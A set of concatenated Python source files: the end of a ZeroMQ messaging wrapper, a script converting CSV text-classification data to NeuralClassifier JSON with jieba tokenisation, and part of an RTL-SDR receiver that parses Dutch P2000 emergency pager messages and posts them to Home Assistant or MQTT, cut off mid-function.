self.push_raw = _Sender('raw', push_only=True, **kwargs)
self.push_string = _Sender('string', push_only=True, **kwargs)
def interrupt(self, reason=None):
"""Interrupt any current and future get*()/push*() calls, causing them to raise
Interrupted(reason) until clear_interrupt() is called. Note that if
get*()/push*() was called with an externally created Interruptor object, then
this method will not interrupt that call, and Interruptor.set() will need to be
called on the given interruptor object instead."""
self.interruptor.set(reason=reason)
def clear_interrupt(self):
"""Clear our internal Interruptor object so that future get*()/push*() calls can
proceed as normal."""
self.interruptor.clear()
# Backwards compatability follows:
# Default to on all interfaces and allow insecure connections.
_ZMQServer = ZMQServer
class ZMQServer(_ZMQServer):
"""Wrapper around a zmq.REP or zmq.PULL socket"""
def __init__(self, port, dtype=None, pull_only=False,
bind_address='tcp://*', shared_secret=None,
allow_insecure=True, **kwargs):
# Allow old kwarg "type" instead of "dtype":
if 'type' in kwargs:
dtype = kwargs.pop('type')
if kwargs:
raise ValueError('too many keyword arguments')
elif dtype is None:
dtype = 'pyobj'
_ZMQServer.__init__(self, port, dtype=dtype, pull_only=pull_only,
bind_address=bind_address,
shared_secret=shared_secret,
allow_insecure=allow_insecure,
**kwargs)
# methods for a default insecure client
_default_client = ZMQClient(allow_insecure=True)
zmq_get = _default_client.get
zmq_get_multipart = _default_client.get_multipart
zmq_get_string = _default_client.get_string
zmq_get_raw = _default_client.get_raw
zmq_push = _default_client.push
zmq_push_multipart = _default_client.push_multipart
zmq_push_string = _default_client.push_string
zmq_push_raw = _default_client.push_raw
__all__ = ['ZMQServer', 'ZMQClient',
'zmq_get', 'zmq_get_multipart', 'zmq_get_string', 'zmq_get_raw',
'zmq_push', 'zmq_push_multipart', 'zmq_push_string', 'zmq_push_raw']
|
df2json.py | """
数据预处理功能,将csv格式的数据处理成腾讯文本分类包NeuralClassifier的数据格式
之前的数据格式:csv文件,字段为label item
目标的数据处理格式:
JSON example:
{
"doc_label": ["Computer--MachineLearning--DeepLearning", "Neuro--ComputationalNeuro"],
"doc_token": ["I", "love", "deep", "learning"],
"doc_keyword": ["deep learning"],
"doc_topic": ["AI", "Machine learning"]
}
其中doc_keyword和doc_topic可选
author:liushuming(80252631)
date:20200321
"""
import numpy as np
import pandas as pd
import jieba
import jieba.analyse
import codecs
import pkuseg
import sys
import json
import re
import threading
from time import ctime,sleep
import os
input_path ="data/"
file_name1 = input_path+"train_v12.csv"
df1 = pd.read_csv(file_name1,error_bad_lines=False)
df1.columns = ['doc_label', 'doc_token']
df1 = df1[['doc_label', 'doc_token']]
df1.head(3)
# 切分训练集和验证集
from sklearn.model_selection import train_test_split
train_data_df, test_data_df= train_test_split(df1, test_size=0.2)
#(train_data_df.shape)
#print(test_data_df.shape)
file_name2 = input_path+"test_v12.csv"
df2 = pd.read_csv(file_name2,error_bad_lines=False)
df2.columns = ['doc_label', 'doc_token']
df2 = df2[['doc_label', 'doc_token']]
df2.head(3)
"""
data_test.csv中数据格式是这样的:
doc_label doc_token
0 是要在车里唱歌么?居然还加了隔音棉!
和之前咱们使用bert分类器的数据格式是一样的,之前的是
label item
"""
# 使用这个文本分类工具,如果是中文的话涉及到分词
# 分词主要用的是jieba分词或者北大pkuseg分词
# 去除停用词
def stop_words(path):
with open(path, encoding='utf-8') as f:
return [l.strip() for l in f]
# 使用jieba分词
def tokenize_by_jieba(doc_token):
seg_list = jieba.cut(doc_token, cut_all=False)
return seg_list
# 使用pkuseg分词
# 一次切分一条数据
def tokenize_by_pkuseg(doc_token):
seg_list = doc_token.split(" ")
seg_list = pkuseg.pkuseg().cut(doc_token) # 以默认配置加载模型进行分词
return seg_list
"""
将dataframe转化成json数据
使用jieba分词
input: dataframe
数据格式:['doc_label', 'doc_token']
tokenize_strategy:可以选“jieba”或者“pkuseg”
outout: json数据
{
"doc_label": ["Computer--MachineLearning--DeepLearning", "Neuro--ComputationalNeuro"],
"doc_token": ["I", "love", "deep", "learning"],
"doc_keyword": ["deep learning"],
"doc_topic": ["AI", "Machine learning"]
}
"""
def data_process(df, outfile, tokenize_strategy):
print('""""""""""data_process start"""""""""""""')
processId = os.getpid()
threadId = threading.currentThread().ident
print(u'%s号进程任务 : '%processId)
print(u'%s号线程任务 : '%threadId)
totalItems = len(df.index)
print('""""""""""print totalItems start"""""""""""""')
print(totalItems)
print('""""""""""print totalItems end"""""""""""""')
#print('""""""""""print df start"""""""""""""')
#print(df)
#print('""""""""""print df end"""""""""""""')
with open(outfile, "w+", buffering=20, encoding='utf-8') as f:
count=0
for indexs in df.index:
print(u'%s号进程任务 : '%processId)
print(u'%s号线程任务 : '%threadId)
count+=1
print('""""""""""doc_token start"""""""""""""')
tmpl = 'count/Total: {curentCount} / {items}!'
print(tmpl.format(curentCount = count,items = totalItems))
print('""""""""""doc_token end"""""""""""""')
dict1 = {}
dict1['doc_label'] = [str(df.loc[indexs].values[0])]
doc_token = df.loc[indexs].values[1]
# 只保留中文、大小写字母和阿拉伯数字
reg = "[^0-9A-Za-z\u4e00-\u9fa5]"
doc_token =re.sub(reg, '', doc_token)
# 中文分词
# 分词策略可以选“jieba”或者“pkuseg”
if tokenize_strategy=='jieba':
seg_list = tokenize_by_jieba(doc_token)
elif tokenize_strategy=='pkuseg':
seg_list = tokenize_by_pkuseg(doc_token)
else:
seg_list = seg_list
# 去除停用词
content = [x for x in seg_list if x not in stop_words(input_path + 'stop_words.txt')]
dict1['doc_token'] = content
dict1['doc_keyword'] = []
dict1['doc_topic'] = []
print('""""""""""doc_label doc_token start"""""""""""""')
print(u'doc_label: %s'%dict1['doc_label'] )
print(u'doc_token: %s'%dict1['doc_token'])
print('""""""""""doc_label doc_token end"""""""""""""')
# 组合成字典
#print(dict1)
# 将字典转化成字符串
json_str = json.dumps(dict1, ensure_ascii=False)
# 已添加的方式写入json文件
f.write('%s\n' % json_str)
print('""""""""""data_process end"""""""""""""')
# pkuseg比较特殊
# 这里咱们使用jieba加工模型训练的数据集
# 然后训练模型,看数据处理是否成功
# data_process(train_data_df, input_path + 'rcv2_train.json', "jieba")
# data_process(test_data_df, input_path + 'rcv2_dev.json', "jieba")
# data_process(df2, input_path + 'rcv2_test.json', "jieba")
threads = []
t1 = threading.Thread(target=data_process,args=(train_data_df, input_path + 'rcv2_train.json', "jieba"))
threads.append(t1)
t2 = threading.Thread(target=data_process,args=(test_data_df, input_path + 'rcv2_dev.json', "jieba"))
threads.append(t2)
t3 = threading.Thread(target=data_process,args=(df2, input_path + 'rcv2_test.json', "jieba"))
threads.append(t3)
if __name__ == '__main__':
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
print("all over %s" %ctime()) |
p2000.py | #!/usr/bin/env python3
"""RTL-SDR P2000 Receiver for Home Assistant."""
import calendar
import configparser
import fnmatch
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
from datetime import datetime
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
import geopy.distance
import paho.mqtt.client as mqtt
import requests
from opencage.geocoder import InvalidInputError, OpenCageGeocode, RateLimitExceededError
VERSION = "0.1.0"
CFGFILE = "config.ini"
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
"""Override original code to fix bug with not deleting old logfiles."""
def __init__(self, filename="", when="midnight", interval=1, backupCount=7):
super().__init__(
filename=filename,
when=when,
interval=int(interval),
backupCount=int(backupCount),
)
def getFilesToDelete(self):
"""Find all logfiles present."""
dirname, basename = os.path.split(self.baseFilename)
filenames = os.listdir(dirname)
result = []
prefix = basename + "."
plen = len(prefix)
for filename in filenames:
if filename[:plen] == prefix:
suffix = filename[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirname, filename))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[: len(result) - self.backupCount]
return result
def doRollover(self):
"""Delete old logfiles but keep latest backupCount amount."""
super().doRollover()
self.close()
timetuple = time.localtime(time.time())
dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for oldlog in self.getFilesToDelete():
os.remove(oldlog)
self.stream = open(self.baseFilename, "w")
currenttime = int(time.time())
newrolloverat = self.computeRollover(currenttime)
while newrolloverat <= currenttime:
newrolloverat = newrolloverat + self.interval
self.rolloverAt = newrolloverat
class Logger:
"""Logger class."""
my_logger = None
def __init__(self, datadir, logstokeep, debug_enabled):
"""Logger init."""
self.my_logger = logging.getLogger()
if debug_enabled:
self.my_logger.setLevel(logging.DEBUG)
self.my_logger.propagate = False
else:
self.my_logger.setLevel(logging.INFO)
self.my_logger.propagate = False
date_fmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(
"%(asctime)s - (%(threadName)-10s) - %(filename)s - %(levelname)s - %(message)s",
date_fmt,
)
console_formatter = logging.Formatter(
"%(asctime)s - (%(threadName)-10s) - %(filename)s - %(levelname)s - %(message)s",
date_fmt,
)
# Create directory if not exists
if not os.path.exists(f"{datadir}/logs"):
os.makedirs(f"{datadir}/logs")
# Log to file and rotate if needed
file_handle = TimedRotatingFileHandler(
filename=f"{datadir}/logs/p2000.log", backupCount=logstokeep
)
file_handle.setFormatter(formatter)
self.my_logger.addHandler(file_handle)
# Log to console
console_handle = logging.StreamHandler()
console_handle.setFormatter(console_formatter)
self.my_logger.addHandler(console_handle)
def log(self, message, level="info"):
"""Call the log levels."""
if level == "info":
self.my_logger.info(message)
elif level == "warning":
self.my_logger.warning(message)
elif level == "error":
self.my_logger.error(message)
elif level == "debug":
self.my_logger.debug(message)
def info(self, message):
"""Info level."""
self.log(message, "info")
def warning(self, message):
"""Warning level."""
self.log(message, "warning")
def error(self, message):
"""Error level."""
self.log(message, "error")
def debug(self, message):
"""Debug level."""
self.log(message, "debug")
class MessageItem:
"""Contains all the Message data."""
def __init__(self):
self.timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
self.message_raw = ""
self.timestamp = ""
self.timereceived = time.monotonic()
self.groupid = ""
self.receivers = ""
self.capcodes = []
self.body = ""
self.location = ""
self.postalcode = ""
self.city = ""
self.address = ""
self.street = ""
self.region = ""
self.priority = 0
self.disciplines = ""
self.remarks = ""
self.longitude = ""
self.latitude = ""
self.opencage = ""
self.mapurl = ""
self.distance = ""
self.friendly_name = ""
def load_config(filename):
"""Create default or load existing config file."""
config = configparser.ConfigParser()
filename = f"{datadir}/{filename}"
if config.read(filename):
# Upgrade config if needed
if config.has_option("home-assistant", "sensorname"):
config.add_section("sensor_p2000")
config.set(
"sensor_p2000",
"zone_latitude","52.37602835336776"
)
config.set(
"sensor_p2000",
"zone_longitude","4.902929475786443"
)
config.set(
"sensor_p2000",
"zone_radius","0"
)
config.remove_option("home-assistant", "sensorname")
with open(filename, "w+") as cfgfile:
config.write(cfgfile)
return config
config["main"] = {"debug": False,
"logtofile": False
}
config["rtl-sdr"] = {
"cmd": "rtl_fm -f 169.65M -M fm -s 22050 | multimon-ng -a FLEX -t raw -"
}
config["home-assistant"] = {
"enabled": True,
"baseurl": "http://homeassistant.local:8123",
"token": "Place your Long-Lived Access Token here"
}
config["mqtt"] = {
"enabled": False,
"mqtt_server": "192.168.1.100",
"mqtt_port": 1883,
"mqtt_user": "mqttuser",
"mqtt_password": "somepassword",
"mqtt_topic": "p2000"
}
config["opencage"] = {
"enabled": False,
"token": "Place your OpenCage API Token here"
}
config["sensor_p2000"] = {
"zone_latitude": "52.37602835336776",
"zone_longitude": "4.902929475786443",
"zone_radius": "0"
}
with open(filename, "w") as configfile:
config.write(configfile)
return False
def check_requirements(self):
"""Check if required software is installed."""
self.logger.info("Checking if required software is installed")
# Check if rtl_fm is installed
process = subprocess.Popen(
"rtl_fm", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Wait for the process to finish
dummy, err = process.communicate()
error_str = err.decode("utf8")
if "not found" in error_str or "not recognized" in error_str:
self.logger.debug("rtl_fm command not found, please install RTL-SDR software")
return False
self.logger.debug("rtl_fm is found")
# Check if multimon-ng is installed
process = subprocess.Popen(
"multimon-ng -h", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Wait for the process to finish
dummy, err = process.communicate()
error_str = err.decode("utf8")
if "not found" in error_str:
self.logger.error(
"multimon-ng not found, please install the multimon-ng package"
)
return False
self.logger.debug("multimon-ng is found")
return True
def load_capcodes_dict(self, filename):
"""Load capcodes to dictionary."""
capcodes = {}
filename = f"{datadir}/{filename}"
try:
self.logger.info("Loading data from '{}'".format(filename))
with open(filename, "r") as csv_file:
csv_list = [
[val.strip() for val in r.split(",")] for r in csv_file.readlines()
]
(_, *header), *data = csv_list
for row in data:
key, *values = row
capcodes[key] = {key: value for key, value in zip(header, values)}
self.logger.info("{} records loaded".format(len(capcodes)))
except KeyError:
self.logger.error(f"Could not parse file contents of: {filename}")
except OSError:
self.logger.info(f"Could not open/read file: {filename}, ignoring filter")
return capcodes
def load_capcodes_filter_dict(self, filename):
"""Load capcodes ignore or match data to dictionary."""
capcodes = dict()
filename = f"{datadir}/{filename}"
try:
self.logger.info("Loading data from '{}'".format(filename))
with open(filename, "r") as text_file:
lines = text_file.readlines()
for item in lines:
if item[0] == "#":
continue
fields = item.split(",")
if len(fields) == 2:
capcodes[fields[0].strip()] = fields[1].strip()
elif len(fields) == 1:
capcodes[fields[0].strip()] = "NO DESCR"
self.logger.info("{} records loaded".format(len(capcodes)))
return capcodes
except KeyError:
self.logger.debug(f"Could not parse file contents of: {filename}")
except OSError:
self.logger.debug(f"Could not open/read file: {filename}, ignoring filter")
return capcodes
def load_list(self, filename):
"""Load data in list."""
tmplist = []
filename = f"{datadir}/{filename}"
try:
self.logger.info("Loading data from '{}'".format(filename))
with open(filename, "r") as text_file:
lines = text_file.readlines()
lines_strip = map((lambda line: line.strip()), lines)
tmplist = list(
filter(
lambda line: len(line) > 0
and line[0:1] != "#"
and line[0:1] != ";",
lines_strip,
)
)
self.logger.info("{} records loaded".format(len(tmplist)))
return tmplist
except KeyError:
self.logger.debug(f"Could not parse file contents of: {filename}")
except OSError:
self.logger.debug(f"Could not open/read file: {filename}")
return tmplist
def check_filter(mylist, text):
"""Check filter data."""
# If list is not loaded or empty allow all
if len(mylist) == 0:
return True
# Check if text applied matches at least one filter
for f_str in mylist:
if fnmatch.fnmatch(text, f_str):
return True
return False
def check_filter_with_list(searchlist, list_to_be_searched):
# If list is not loaded or empty allow all
if len(searchlist) == 0:
return True
# Check every text in the searchedlist
for searchedtext in list_to_be_searched:
if check_filter(searchlist, searchedtext) == True:
return True
return False
def to_local_datetime(utc_dt):
"""Convert utc to local time."""
time_tuple = time.strptime(utc_dt, "%Y-%m-%d %H:%M:%S")
return time.ctime(calendar.timegm(time_tuple))
def p2000_get_prio(message):
"""Look for priority strings and return level."""
priority = 0
regex_prio1 = r"^A\s?1|\s?A\s?1|PRIO\s?1|^P\s?1"
regex_prio2 = r"^A\s?2|\s?A\s?2|PRIO\s?2|^P\s?2"
regex_prio3 = r"^B\s?1|^B\s?2|^B\s?3|PRIO\s?3|^P\s?3"
regex_prio4 = r"^PRIO\s?4|^P\s?4"
if re.search(regex_prio1, message, re.IGNORECASE):
priority = 1
elif re.search(regex_prio2, message, re.IGNORECASE):
priority = 2
elif re.search(regex_prio3, message, re.IGNORECASE):
priority = 3
elif re.search(regex_prio4, message, re.IGNORECASE):
priority = 4
return priority
# Log all messages send or ignored to a logfile in folder logfiles
def log2file(logmessage):
print("log2file called")
datestamp = time.strftime("%Y%m%d")
logfilename = 'logfiles/p2000-log-' + datestamp + '.log'
open(logfilename,'a').write(logmessage)
open(logfilename,'a').write("\n")
return
# Set and change to program directory
datadir = os.path.dirname(os.path.realpath(__file__))
os.chdir(datadir)
# Load configuration
config = load_config(CFGFILE)
# Init logging
logger = Logger(datadir, 7, config.getboolean("main", "debug"))
class Main:
"""Main class, start of application."""
def __init__(self):
self.running = True
self.messages = []
# Init logging
self.logger = logger
self.config = config
if self.config:
self.logger.info(f"Loading configuration from '{CFGFILE}'")
else:
self.logger.info(
f"Created config file '{CFGFILE}', edit it and restart the program."
)
self.debug = self.config.getboolean("main", "debug")
self.logtofile = self.config.getboolean("main", "logtofile")
# Set current folder so we can find the config files
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# If log2file is enabled, check if logfiles folder exists
if self.logtofile:
if (not os.path.exists('logfiles')):
os.mkdir('logfiles')
self.logger.info(f"RTL-SDR P2000 Receiver for Home Assistant Version {VERSION}")
self.logger.info("Started at %s" % time.strftime("%A %H:%M:%S %d-%m-%Y"))
# Check if required software is installed
if not check_requirements(self):
self.logger.error("Application stopped, required software was not found!")
sys.exit(0)
self.rtlfm_cmd = self.config.get("rtl-sdr", "cmd")
self.use_hass = self.config.getboolean("home-assistant", "enabled")
self.baseurl = self.config.get("home-assistant", "baseurl")
self.token = self.config.get("home-assistant", "token")
self.use_mqtt = self.config.getboolean("mqtt", "enabled")
self.mqtt_server = self.config.get("mqtt", "mqtt_server")
self.mqtt_port = int(self.config.get("mqtt", "mqtt_port"))
self.mqtt_username = self.config.get("mqtt", "mqtt_user")
self.mqtt_password = self.config.get("mqtt", "mqtt_password")
self.mqtt_topic = self.config.get("mqtt", "mqtt_topic")
self.use_opencage = self.config.getboolean("opencage", "enabled")
self.opencagetoken = self.config.get("opencage", "token")
self.opencage_disabled = False
# Load capcodes data
self.capcodes = load_capcodes_dict(self, "db_capcodes.txt")
# Load plaatsnamen data
self.plaatsnamen = load_list(self, "db_plaatsnamen.txt")
# Load plaatsnamen afkortingen data
self.pltsnmn = load_capcodes_dict(self, "db_pltsnmn.txt")
# Load capcodes ignore data
self.ignorecapcodes = load_capcodes_filter_dict(self, "ignore_capcodes.txt")
# Load text ignore data
self.ignoretext = load_list(self, "ignore_text.txt")
# Load match text filter data
# self.matchtext = load_list(self, "match_text.txt.example")
self.matchtext = load_list(self, "match_text.txt")
# Load match capcodes filter data
self.matchcapcodes = load_capcodes_filter_dict(self, "match_capcodes.txt")
# Start thread to get data from RTL-SDR stick
data_thread = threading.Thread(name="DataThread", target=self.data_thread_call)
data_thread.start()
# Start thread to post messages to Home Assistant
post_thread = threading.Thread(name="PostThread", target=self.post_thread_call)
post_thread.start()
# Run the wait loop
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
break
# Application is interrupted and is stopping
self.running = False
self.logger.info("Application stopped")
def post_data(self, msg):
# Loop through all sensors
for section in config.sections():
# Each section is a sensor
self.radius = ""
self.sensorname = ""
self.home_coordinates = ""
self.friendly_name = ""
self.searchkeyword = ""
self.searchcapcode = ""
self.searchregion = ""
post = False
if section.startswith("sensor_"):
self.sensorname = section.replace("sensor_", "")
if "zone_radius" in self.config.options(section):
self.home_coordinates = (
float(self.config.get(section, "zone_latitude")),
float(self.config.get(section, "zone_longitude"))
)
self.radius = self.config.get(section, "zone_radius", fallback="")
msg.friendly_name = self.config.get(section, "friendlyname", fallback="P2000-SDR")
self.searchkeyword = self.config.get(section, "searchkeyword", fallback="").split(",")
self.searchcapcode = self.config.get(section, "searchcapcode", fallback="").split(",")
self.searchregion = self.config.get(section, "searchregion", fallback="").split(",")
self.searchdiscipline = self.config.get(section, "searchdiscipline", fallback="").split(",")
# If location is known and radius is specified in config calculate distance and check radius
if msg.latitude and msg.longitude and self.radius:
event_coordinates = (msg.latitude, msg.longitude)
msg.distance = round(
geopy.distance.geodesic(
self.home_coordinates, event_coordinates
).km,
2,
)
self.logger.debug(
f"Distance from home {msg.distance} km, radius set to {self.radius} km"
)
if msg.distance > float(self.radius):
self.logger.debug(
f"Message '{msg.body}' ignored for sensor {self.sensorname} (distance outside radius)"
)
msg.is_posted = True
continue
post = True
# Check for matched text/keyword
if "searchkeyword" in self.config.options(section):
if not check_filter(self.searchkeyword, msg.body):
self.logger.debug(
f"Message '{msg.body}' ignored for sensor {self.sensorname} (didn't match keyword) - {self.searchkeyword}"
)
msg.is_posted = True
continue
self.logger.debug(
f"Message '{msg.body}' posted for sensor {self.sensorname} (sensor succesfull match keyword) - {self.searchkeyword}"
)
post = True
# Check for matched regions
if "searchregion" in self.config.options(section):
if not check_filter(self.searchregion, msg.region):
self.logger.debug(
f"Message '{msg.body}' ignored for sensor {self.sensorname} (didn't match region) - {self.searchregion}"
)
msg.is_posted = True
continue
self.logger.debug(
f"Message '{msg.body}' posted for sensor {self.sensorname} (sensor succesfull match region) - {self.searchregion}"
)
post = True
# Check for matched capcodes
if "searchcapcode" in self.config.options(section):
if not check_filter_with_list(self.searchcapcode, msg.capcodes):
self.logger.debug(
f"Message '{msg.body}'{msg.capcodes} ignored for sensor {self.sensorname} (didn't match capcode) - {self.searchcapcode}"
)
msg.is_posted = True
continue
self.logger.debug(
f"Message '{msg.body}'{msg.capcodes} posted for sensor {self.sensorname} (sensor succesfull match capcode) - {self.searchcapcode}"
)
post = True
# Check for matched disciplines
if "searchdiscipline" in self.config.options(section):
if not check_filter(self.searchdiscipline, msg.disciplines):
self.logger.debug(
f"Message '{msg.body}'{msg.disciplines} ignored for sensor {self.sensorname} (didn't match discipline) - {self.searchdiscipline}"
)
msg.is_posted = True
continue
self.logger.debug(
f"Message '{msg.body}'{msg.disciplines} posted for sensor {self.sensorname} (sensor succesfull match discipline) - {self.searchdiscipline}"
)
post = True
# No other matches valid, if distance is not valid, skip
if post is False:
self.logger.debug(
f"Message '{msg.body}' ignored for sensor {self.sensorname} (no post criteria)"
)
msg.is_posted = True
continue
# If logging all messages to file is requested, log message
if self.logtofile:
logmessage = "Posted" + ' -|- ' + msg.message_raw + ' -|- ' + self.sensorname + ' -|- ' + msg.region + ' -|- ' + msg.mapurl
log2file(logmessage)
"""Post data to Home Assistant via Rest API and/or MQTT topic."""
data = {
"state": msg.body,
"attributes": {
"time received": msg.timestamp,
"group id": msg.groupid,
"receivers": msg.receivers,
"capcodes": msg.capcodes,
"priority": msg.priority,
"disciplines": msg.disciplines,
"raw message": msg.message_raw,
"region": msg.region,
"location": msg.location,
"postal code": msg.postalcode,
"city": msg.city,
"address": msg.address,
"street": msg.street,
"remarks": msg.remarks,
"longitude": msg.longitude,
"latitude": msg.latitude,
"opencage": msg.opencage,
"mapurl": msg.mapurl,
"distance": msg.distance,
"friendly_name": msg.friendly_name,
},
}
heartbeat = {
"state": time.strftime("%Y%m%d"),
}
if self.use_hass:
try:
self.logger.debug(f"Posting to Home Assistant - {self.sensorname}")
headers = {
"Authorization": "Bearer " + self.token,
"content-type": "application/json",
}
response = requests.post(
self.baseurl + "/api/states/sensor." + self.sensorname,
headers=headers,
data=json.dumps(
data, default=lambda o: o.__dict__, sort_keys=True, indent=4
),
)
response.raise_for_status()
self.logger.debug(f"POST data: {data}")
self.logger.debug(
f"POST status: {response.status_code} {response.reason}"
)
self.logger.debug(f"POST text: {response.text}")
self.logger.debug(f"OpenCage status: {msg.opencage}")
except requests.HTTPError:
self.logger.error(
f"HTTP Error while trying to post data, check baseurl and token in config.ini: {response.status_code} {response.reason}"
)
except requests.exceptions.SSLError as err:
self.logger.error(
f"SSL Error occurred while trying to post data, check baseurl in config.ini:\n{err}"
)
except requests.exceptions.ConnectionError as err:
self.logger.error(
f"Connection Error occurred while trying to post data, check baseurl in config.ini:\n{err}"
)
finally:
# Mark as posted to prevent race conditions
msg.is_posted = True
if self.use_mqtt:
try:
self.logger.debug("Posting to MQTT")
data = json.dumps(data)
client = mqtt.Client()
client.username_pw_set(self.mqtt_username, self.mqtt_password)
client.connect(self.mqtt_server, self.mqtt_port, 60)
client.publish(self.mqtt_topic, data)
client.disconnect()
self.logger.debug(
f"MQTT status: Posting to {self.mqtt_server}:{self.mqtt_port} topic:{self.mqtt_topic}"
)
self.logger.debug(f"MQTT json: {data}")
finally:
# Mark as posted to prevent race conditions
msg.is_posted = True
def data_thread_call(self):
"""Thread for parsing data from RTL-SDR."""
self.logger.info(f"RTL-SDR process started with: {self.rtlfm_cmd}")
multimon_ng = subprocess.Popen(
self.rtlfm_cmd, stdout=subprocess.PIPE, shell=True
)
try:
while self.running:
# Read line from process
line = multimon_ng.stdout.readline()
try:
line = line.decode("utf8", "backslashreplace")
except UnicodeDecodeError:
self.logger.debug(f"Error while decoding utf8 string: {line}")
line = ""
multimon_ng.poll()
if line.startswith("FLEX") and line.__contains__("ALN"):
line_data = line.split("|")
timestamp = line_data[1]
groupid = line_data[3].strip()
capcodes = line_data[4].strip()
message = line_data[6].strip()
priority = p2000_get_prio(message)
location = ""
postalcode = ""
city = ""
address = ""
street = ""
longitude = ""
latitude = ""
opencage = ""
distance = ""
mapurl = ""
gpscheck = False
self.logger.debug(line.strip())
# Check capcodes first, only if they are defined in config
if self.matchcapcodes or self.ignorecapcodes:
for capcode in capcodes.split(" "):
if self.matchcapcodes:
# Apply filter
if capcode in self.matchcapcodes:
self.logger.debug(
f"Capcode '{capcode}' found in '{self.matchcapcodes}' (capcode in match_capcodes)"
)
else:
self.logger.debug(
f"Message '{message}' ignored because capcode '{capcode}' not found in '{self.matchcapcodes}'"
)
continue
if self.ignorecapcodes and len(capcodes.split(" ")) == 1:
if capcode in self.ignorecapcodes:
self.logger.debug(
f"Message '{message}' ignored because it contains only one capcode '{capcode}' which is found in '{self.ignorecapcodes}' (capcode in ignore_capcodes)"
)
continue
# Check for ignore texts
if check_filter(self.ignoretext, message):
self.logger.debug(
f"Message '{message}' ignored (matched ignore_text)"
)
if self.logtofile:
logmessage = "Ignore text" + ' -|- ' + line.strip()
log2file(logmessage)
continue
# Get address info if any, look for valid postalcode and get the two words around them
# A2 (DIA: ja) AMBU 17106 Schiedamseweg 3134BA Vlaardingen VLAARD bon 8576
regex_address = r"(\w*.) ([1-9][0-9]{3}[a-zA-Z]{2}) (.\w*)"
addr = re.search(regex_address, message)
if addr:
street = addr.group(1)
postalcode = addr.group(2)
city = addr.group(3)
address = f"{street} {postalcode} {city}"
# Remove Capitalized city name from message (when postalcode is found)
regex_afkortingen = "[A-Z]{2,}"
afkortingen = re.findall(regex_afkortingen, message)
for afkorting in afkortingen:
if afkorting in self.pltsnmn:
message = re.sub(afkorting, "", message)
# Get address in info if any, look for valid postalcode without letters and get the two words around them
# A1 13108 Surinameplein 1058 Amsterdam 12006
regex_address2 = r"(\w*.) ([1-9][0-9]{3}) (.\w*)"
addr2 = re.search(regex_address2, message)
if addr2:
# print("Regex Amsterdam")
street = addr2.group(1)
postalcode = addr2.group(2)
city = addr2.group(3)
address = f"{street} {city}"
# Remove Capitalized city name from message (when postalcode is found)
regex_afkortingen = "[A-Z]{2,}"
afkortingen = re.findall(regex_afkortingen, message)
for afkorting in afkortingen:
if afkorting in self.pltsnmn:
message = re.sub(afkorting, "", message)
# Try to get city only when there is one after a prio
# A1 Breda
else:
regex_prio_loc = r"(^A\s?1|\s?A\s?2|B\s?1|^B\s?2|^B\s?3|PRIO\s?1|^P\s?1|PRIO\s?2|^P\s?2) (.\w*)"
loc = re.search(regex_prio_loc, message)
if loc and loc.group(2) in self.plaatsnamen:
city = loc.group(2)
else:
# Find all uppercase words and check if there is a valid city name amoung them
# A2 Ambulancepost Moordrecht Middelweg MOORDR V
regex_afkortingen = "[A-Z]{2,}"
afkortingen = re.findall(regex_afkortingen, message)
for afkorting in afkortingen:
if afkorting in self.pltsnmn:
city = self.pltsnmn[afkorting]["plaatsnaam"]
# If uppercase city is found, grab first word before that city name, since it's likely to be the streetname
regex_address = rf"(\w*.) ({afkorting})"
addr = re.search(regex_address, message)
if addr:
street = addr.group(1)
address = f"{street} {city}"
# Change uppercase city to normal city in message
message = re.sub(afkorting, city, message)
# If no address is found, do a wild guess
if not address:
# Strip all status info from messag
regex_messagestrip = r"(^A\s?1|\s?A\s?2|B\s?1|^B\s?2|^B\s?3|PRIO\s?1|^P\s?1|PRIO\s?2|^P\s?2|^PRIO\s?3|^P\s?3|^PRIO\s?4|^P\s?4)(\W\d{2,}|.*(BR)\b|)|(rit:|rit|bon|bon:|ambu|dia|DIA)\W\d{5,8}|\b\d{5,}$|( : )|\(([^\)]+)\)( \b\d{5,}|)|directe (\w*)|(-)+/gi"
strip = re.sub(regex_messagestrip, "", message, flags=re.I)
# Strip any double spaces from message
regex_doublespaces = r"(^[ \t]+|[ \t]+$)"
strip = re.sub(regex_doublespaces, "", strip)
# Strip all double words from message
regex_doublewords = r"(\b\S+\b)(?=.*\1)"
strip = re.sub(regex_doublewords, "", strip)
# print("Strip: " + strip)
# Search in leftover message for a city corresponding to City list
for plaatsnaam in self.plaatsnamen:
if plaatsnaam in strip:
self.logger.debug("City found: " + plaatsnaam)
# Find first word left from city
regex_plaatsnamen_strip = (
rf"\w*.[a-z|A-Z] \b{plaatsnaam}\b"
)
plaatsnamen_strip = re.search(
regex_plaatsnamen_strip, strip
)
if plaatsnamen_strip:
addr = plaatsnamen_strip.group(0)
# Final non address symbols strip
regex_plaatsnamen_strip_strip = (
r"(- )|(\w[0-9] )"
)
addr = re.sub(
regex_plaatsnamen_strip_strip, "", addr
)
address = addr
city = plaatsnaam
self.logger.debug(
"Adress found: "
+ plaatsnamen_strip.group(0)
)
# Get more info about the capcodes
for capcode in capcodes.split(" "):
if capcode in self.capcodes:
receiver = "{} ({})".format(
self.capcodes[capcode]["description"],
capcode
)
discipline = "{}".format(
self.capcodes[capcode]["discipline"]
)
region = self.capcodes[capcode]["region"]
location = self.capcodes[capcode]["location"]
remark = self.capcodes[capcode]["remark"]
else:
receiver = capcode
discipline = ""
region = ""
remark = ""
# If this message was already received, only add extra info
if len(self.messages) > 0 and self.messages[0].body == message:
if self.messages[0].receivers == "":
self.messages[0].receivers = receiver
elif receiver:
self.messages[0].receivers += ", " + receiver
if self.messages[0].disciplines == "":
self.messages[0].disciplines = discipline
elif discipline:
self.messages[0].disciplines += ", " + discipline
if self.messages[0].remarks == "":
self.messages[0].remarks = remark
elif remark:
